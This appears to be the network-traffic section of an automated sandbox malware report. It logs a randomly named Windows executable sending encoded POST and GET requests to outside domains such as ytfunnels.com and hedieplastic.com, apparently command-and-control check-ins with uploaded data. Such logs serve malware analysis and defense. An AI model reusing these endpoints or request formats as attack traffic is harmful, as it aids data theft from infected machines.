                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFo65z77J/ScjJVeSTVYsw9gpSRkKM8aZC1w0zaojAYAtyIUHf1bduiT/wQgHyez2Rv2sad5RrnsFjsM6FnSpe11rTh4Bb1l9XkYDcF9fe/xt5ApLbv8ErjV5rq+n4K5XMUBPnE0grcO2RQ4XpKXYV5CkpGoDTouh8kHeWI9NQy9CMdCF97Qrz0/NOkjkJPLwwEmfa4WYxEn5IYiOgsvIyDJeiM2F8Tei0q9Sgdi2Xnf2zTkLVZO3PAD8c6zTtBX6YiYirpzXfw7hXkTy94uVsKvrpqYe/rNUe8O/deyiEsrwMkOT39S2KE6OI60IDEPDShfmikE74Y9PPH2UdqYBcdQD7Jf5uM8nEK60/Wy4NYdj8mbCnMrxIH3pr13QV2+pzEU8U5LuSzueCVlO0ss2EnpnZxnWqZmhAKYv1BsO5gF1hx7Jrm0GI/qad9nMfxmaxdZze1gsP4u9NdhkhifFf+KOG8rOIycYCXlv895FrKv5VSLERrzC4T3qE+ZT3vpoGm8+7KfkuktI7VHD8GdaxmwLNV32u5MKwPDj7zjLz1GBcSpiQ7Iz1z9nybTNdiWc3GWChsoJHgOwemxhlGKsjsIpz9jcJY80M5IWkJwpWNNm7/9x+BaRqvTFdIDm+6uWsyZywImIkNziXbWUYug9rzluALemPvJEcovXH0vEE+3I7BIMuttVXHiYis6TsMwXTlcLXIY5Sojyq5GJgxTUUzgmyW47d4hFL5KFDev9Gt9K3OrbchbXH7mquSF/W5Lb0WC
                                                                                                                                                    Oct 4, 2024 12:00:06.378210068 CEST5638OUTData Raw: 68 72 53 33 59 69 79 6f 33 73 64 55 66 4d 49 45 4e 32 6f 39 63 6a 6a 4a 6f 46 53 77 66 2b 69 55 4d 34 39 66 76 45 37 36 54 54 78 4d 31 44 6b 69 31 35 49 36 4f 42 4c 2f 59 73 67 46 36 4c 46 48 6d 46 69 53 34 4b 4c 4c 4e 68 6b 55 77 52 6c 4e 30 55
                                                                                                                                                    Data Ascii: hrS3Yiyo3sdUfMIEN2o9cjjJoFSwf+iUM49fvE76TTxM1Dki15I6OBL/YsgF6LFHmFiS4KLLNhkUwRlN0U8WEl3bCXt8drkyXhvk+I44gF8dkaSAoAKRq/wJmlzC8qIu/dk6UCirMDTuzo74VfRL1pVwsKSrpvebna3L4ZGT96asWYi44J731b7q80O9gdUZfmMRiqIMTpdzvXbfO4nPYPFI41NsimEjz+ZulLh6oP2E2YOmxbN
                                                                                                                                                    Oct 4, 2024 12:00:06.492801905 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:06 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    32192.168.11.2049764162.255.119.150801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:09.018197060 CEST432OUTGET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:00:09.132087946 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    33192.168.11.204976591.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:22.645256042 CEST687OUTPOST /qrln/ HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.ytfunnels.com
                                                                                                                                                    Referer: http://www.ytfunnels.com/qrln/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 74 39 66 4e 6e 2b 61 7a 66 31 37 68 30 37 6c 79 48 73 56 39 36 45 30 54 2b 47 61 47 72 68 73 63 73 6a 36 53 57 64 35 71 53 6a 37 46 6d 41 2b 63 63 36 4e 42 48 78 75 67 79 73 72 45 41 50 50 66 78 6c 4e 54 42 4a 7a 43 4a 4d 31 43 6e 47 47 4d 64 51 7a 61 39 73 46 36 73 43 52 4f 4e 5a 58 44 39 79 2f 2b 4e 48 58 6b 54 4e 6a 78 30 54 53 78 34 65 4a 54 51 4a 45 62 7a 43 47 49 65 7a 4f 56 50 4d 75 50 49 72 55 4e 53 39 39 6c 67 7a 69 43 47 68 46 78 73 70 71 79 50 61 43 63 72 30 72 35 6e 64 4e 53 74 47 6e 47 77 35 45 76 74 6e 54 70 44 4b 61 68 63 6e 61 71 65 31 4a 43 48 6a 7a 47 57 67 3d 3d
                                                                                                                                                    Data Ascii: PbG=t9fNn+azf17h07lyHsV96E0T+GaGrhscsj6SWd5qSj7FmA+cc6NBHxugysrEAPPfxlNTBJzCJM1CnGGMdQza9sF6sCRONZXD9y/+NHXkTNjx0TSx4eJTQJEbzCGIezOVPMuPIrUNS99lgziCGhFxspqyPaCcr0r5ndNStGnGw5EvtnTpDKahcnaqe1JCHjzGWg==
                                                                                                                                                    Oct 4, 2024 12:00:22.827095032 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    34192.168.11.204976691.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:25.347562075 CEST707OUTPOST /qrln/ HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.ytfunnels.com
                                                                                                                                                    Referer: http://www.ytfunnels.com/qrln/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 74 39 66 4e 6e 2b 61 7a 66 31 37 68 31 59 4e 79 49 76 39 39 76 55 30 53 77 6d 61 47 2b 52 73 59 73 6a 32 53 57 63 39 36 52 52 76 46 6e 68 4f 63 66 2f 35 42 4b 52 75 67 34 4d 72 42 64 2f 50 55 78 6c 52 39 42 4a 2f 43 4a 4d 68 43 6e 47 32 4d 64 6e 48 56 38 38 46 34 31 53 52 4d 44 35 58 44 39 79 2f 2b 4e 48 44 65 54 4c 4c 78 30 6a 43 78 34 37 6c 51 5a 70 45 61 30 43 47 49 4a 6a 4f 5a 50 4d 76 71 49 71 49 6e 53 2b 56 6c 67 79 53 43 48 30 70 79 6a 70 71 30 43 36 43 4d 67 30 69 6c 68 65 4e 43 71 55 2f 72 70 38 55 78 73 78 43 7a 65 34 75 46 66 30 47 59 61 46 77 71 46 68 79 64 4c 68 65 78 6b 47 51 43 4f 42 48 70 4c 50 69 69 61 6d 46 74 41 35 34 3d
                                                                                                                                                    Data Ascii: PbG=t9fNn+azf17h1YNyIv99vU0SwmaG+RsYsj2SWc96RRvFnhOcf/5BKRug4MrBd/PUxlR9BJ/CJMhCnG2MdnHV88F41SRMD5XD9y/+NHDeTLLx0jCx47lQZpEa0CGIJjOZPMvqIqInS+VlgySCH0pyjpq0C6CMg0ilheNCqU/rp8UxsxCze4uFf0GYaFwqFhydLhexkGQCOBHpLPiiamFtA54=
                                                                                                                                                    Oct 4, 2024 12:00:25.529917955 CEST305INHTTP/1.1 405 Not Allowed
                                                                                                                                                    date: Fri, 04 Oct 2024 10:00:25 GMT
                                                                                                                                                    content-type: text/html
                                                                                                                                                    content-length: 154
                                                                                                                                                    server: Parking/1.0
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    35192.168.11.204976791.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:28.050700903 CEST2578OUTPOST /qrln/ HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.ytfunnels.com
                                                                                                                                                    Referer: http://www.ytfunnels.com/qrln/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 74 39 66 4e 6e 2b 61 7a 66 31 37 68 31 59 4e 79 49 76 39 39 76 55 30 53 77 6d 61 47 2b 52 73 59 73 6a 32 53 57 63 39 36 52 52 33 46 6e 54 47 63 63 63 68 42 4c 52 75 67 6d 63 72 36 64 2f 50 7a 78 6c 4a 78 42 4a 69 39 4a 4f 5a 43 6e 6c 4f 4d 66 54 62 56 31 38 46 34 39 79 52 4e 4e 5a 58 61 39 79 76 69 4e 48 54 65 54 4c 4c 78 30 6d 47 78 78 4f 4a 51 62 70 45 62 7a 43 47 4d 65 7a 4f 39 50 4b 48 51 49 71 4d 64 54 50 31 6c 67 53 43 43 4c 6d 78 79 71 70 71 32 4d 61 44 54 67 30 2b 4d 68 65 52 34 71 56 4c 42 70 37 49 78 74 45 50 50 43 4b 48 64 45 6b 61 79 47 47 41 75 44 41 4f 65 45 47 4b 4b 31 47 45 5a 4a 31 65 67 41 4d 43 68 46 6e 42 68 63 70 58 69 59 68 33 54 6a 52 38 61 46 44 72 39 69 73 4d 58 36 67 61 6e 72 46 4a 2f 4f 53 33 59 68 36 31 4d 4c 32 35 79 32 44 31 34 4d 4d 33 6c 4d 57 66 4f 2f 31 6a 59 57 2b 36 30 45 35 30 6b 35 46 2b 32 68 70 73 36 36 50 72 41 50 66 73 43 33 2f 35 78 55 72 37 33 43 5a 54 6b 45 56 45 63 36 44 64 6b 4f 6e 4f 32 58 61 35 4b 36 6b 78 48 4c 32 66 43 39 35 68 63 6a 51 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=t9fNn+azf17h1YNyIv99vU0SwmaG+RsYsj2SWc96RR3FnTGccchBLRugmcr6d/PzxlJxBJi9JOZCnlOMfTbV18F49yRNNZXa9yviNHTeTLLx0mGxxOJQbpEbzCGMezO9PKHQIqMdTP1lgSCCLmxyqpq2MaDTg0+MheR4qVLBp7IxtEPPCKHdEkayGGAuDAOeEGKK1GEZJ1egAMChFnBhcpXiYh3TjR8aFDr9isMX6ganrFJ/OS3Yh61ML25y2D14MM3lMWfO/1jYW+60E50k5F+2hps66PrAPfsC3/5xUr73CZTkEVEc6DdkOnO2Xa5K6kxHL2fC95hcjQnhFr9nb58l907jSZtxaGnFz0ECHfqyJwqWMnftkNt1sDivpzZXTwHE0BmvmnfypcxeWfwwHhXIQl/T2mwoOMcEngDdyTUFmfpvOgkWlxBn2fzrQl0S//3nu1GFM+APWPtbLeo/4oYBu5+VkNVcxNX+EisFslLn3QTQ9JBUraK29+WlLFY3cHEO/HPaAhhlsET/N57/JlFwtLTLlAcL1sz0EkJfEoBzR9yZVEmqygWH2jD25sP6Ds0HWd6SS7Ux8UzrTPYKAkJA1Mq4Ri7/20FLeIld1vKABA4Zvrkpn3zr38UJoa+1fkJ6IeRQigpPt403vvWmxSzgIfiaFDrbQYNJAvVXbBlZ4/tGVbxbnJezSDByzc8uW/BU2EFFLnJw+fntmcz1E0lshIWajncdVUkI2IQMTC5irDAARS0oojgnM9q6POGTddELMTjG12xHlW8OC22HmLi5b8A5SrlwwFeutCG0n0ZbpXJgW/jTbyr9UkKi+Xz7Zbx67d8k31v83IzDYYLeCtn9JIvHHJrFTnglckxH9oWCVaM4hye9DLEDWoLoNNo0oWJ9Ya6gcyFJIpdFDO6VVypIB3ge/Ws/WjhrFIHElcZeYF86t+TQ6lzmJbHZBMRMVHXfUq41rvb/zXEvpW2H97pTH3+saopTQp+f/46nBQF1OINk [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:28.050750017 CEST4334OUTData Raw: 55 2b 69 74 39 65 6a 39 72 53 4f 39 57 46 59 35 74 67 41 49 4b 42 54 79 6c 7a 2f 62 2b 77 4b 76 6d 61 42 42 70 2b 77 32 32 35 30 6c 62 43 6b 52 57 64 67 52 2b 4c 75 62 51 4d 6b 54 54 57 63 44 6a 43 54 65 6e 4e 76 37 4f 5a 53 6e 30 6e 6d 37 73 4b
                                                                                                                                                    Data Ascii: U+it9ej9rSO9WFY5tgAIKBTylz/b+wKvmaBBp+w2250lbCkRWdgR+LubQMkTTWcDjCTenNv7OZSn0nm7sKmLjWdqgAaEfCdThzZh7PEYkBuj1Jq9lLyEUZ0XB/nQKqUBNuK4ZUBDLaqk2Z5611Ly7UKGdA2UdYzx5cbVHmwOb9K865NWLclwbf/ITTziOTWh4V07rZZrWMXNEBNoHNxLV8tymk/gFVTEjulpGh4qcYiRC5Mmpz9
                                                                                                                                                    Oct 4, 2024 12:00:28.232295990 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    36192.168.11.204976891.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:30.753542900 CEST427OUTGET /qrln/?PbG=g/3tkO+pfBzB25V2Fctu5FsR83L3yxpv2AjDY8JJQQvDhQWyNNgQJTDimODyfvCkj1kKdo2+K9Uv71CRdCP6v9xe1ERDIsip1ir5cWHLWL+Z9Uyq0+QdRb0=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.ytfunnels.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:00:30.935415030 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    37192.168.11.204976946.102.130.116801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:37.813080072 CEST696OUTPOST /qlei/ HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.hedieplastic.com
                                                                                                                                                    Referer: http://www.hedieplastic.com/qlei/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 34 66 4a 42 38 65 64 55 31 32 30 4a 52 46 61 4e 49 6d 4a 4d 5a 6c 56 5a 66 4f 78 71 72 44 48 6e 4a 44 34 41 74 55 30 51 77 53 30 71 2f 30 30 36 4b 66 54 42 74 4b 32 4e 6e 56 36 72 70 66 78 4e 57 6b 48 69 78 7a 39 71 62 5a 37 65 2f 43 58 74 55 54 4a 4c 48 52 6b 49 4a 66 39 55 4c 75 39 63 52 48 52 4b 69 50 68 77 73 56 55 76 4e 79 6f 6f 5a 56 6d 63 48 32 33 36 4d 70 47 6e 65 75 65 4a 63 62 52 76 48 73 43 6c 45 67 37 30 49 2b 79 31 35 65 7a 68 6e 31 30 32 6e 74 68 4c 57 39 44 36 55 58 42 46 4e 45 7a 49 50 43 41 63 32 52 50 62 59 58 4a 45 6a 74 2f 51 76 32 42 45 4a 67 7a 2b 59 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=4fJB8edU120JRFaNImJMZlVZfOxqrDHnJD4AtU0QwS0q/006KfTBtK2NnV6rpfxNWkHixz9qbZ7e/CXtUTJLHRkIJf9ULu9cRHRKiPhwsVUvNyooZVmcH236MpGneueJcbRvHsClEg70I+y15ezhn102nthLW9D6UXBFNEzIPCAc2RPbYXJEjt/Qv2BEJgz+YQ==
                                                                                                                                                    Oct 4, 2024 12:00:38.135201931 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=jrsx5mkgfgpcnqwjecgalre1; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:38 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 [TRUNCATED]
